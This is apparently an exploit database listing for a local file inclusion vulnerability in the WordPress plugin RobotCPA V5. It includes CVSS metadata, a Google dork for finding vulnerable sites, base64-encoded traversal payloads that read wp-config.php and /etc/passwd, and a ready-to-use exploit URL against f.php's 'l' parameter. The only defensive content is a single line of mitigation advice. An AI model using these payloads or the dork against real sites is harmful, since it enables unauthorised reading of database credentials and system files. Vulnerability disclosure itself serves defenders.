Wordpress Plugin RobotCPA V5 - Local File Include

vendor:

RobotCPA

by:

T3N38R15

8.8

CVSS

HIGH

Local File Include

CWE

Product Name: RobotCPA

Affected Version From: V5

Affected Version To: V5

Patch Exists: NO

Related CWE: N/A

CPE: a:robot-cpa:robotcpa

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux

2015

WordPress Plugin RobotCPA V5 – Local File Include

The affected file is f.php and the get-parameter 'l' is vulnerable to local file inclusion. We just need to base64 encode our injection, like 'php://filter/resource=./../../../wp-config.php' or 'file:///etc/passwd', and then use it in a URL like 'http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk' to view the content of the passwd file.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file path.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
# Google Dork: inurl:"/wp-content/plugins/robotcpa/"
# Date: 09.06.2015
# Exploit Author: T3N38R15
# Vendor Homepage: http://robot-cpa.good-info.co/
# Version: 5V
# Tested on: Windows (Firefox)
                   Linux      (Firefox)
The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion.
We just need to base64 encode our injection.
Like that : 
php://filter/resource=./../../../wp-config.php
cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==
or
file:///etc/passwd
ZmlsZTovLy9ldGMvcGFzc3dk

our injection look then like that :
http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
and we can see the content of the passwd file.

greets to Black Sniper
Regards T3N38R15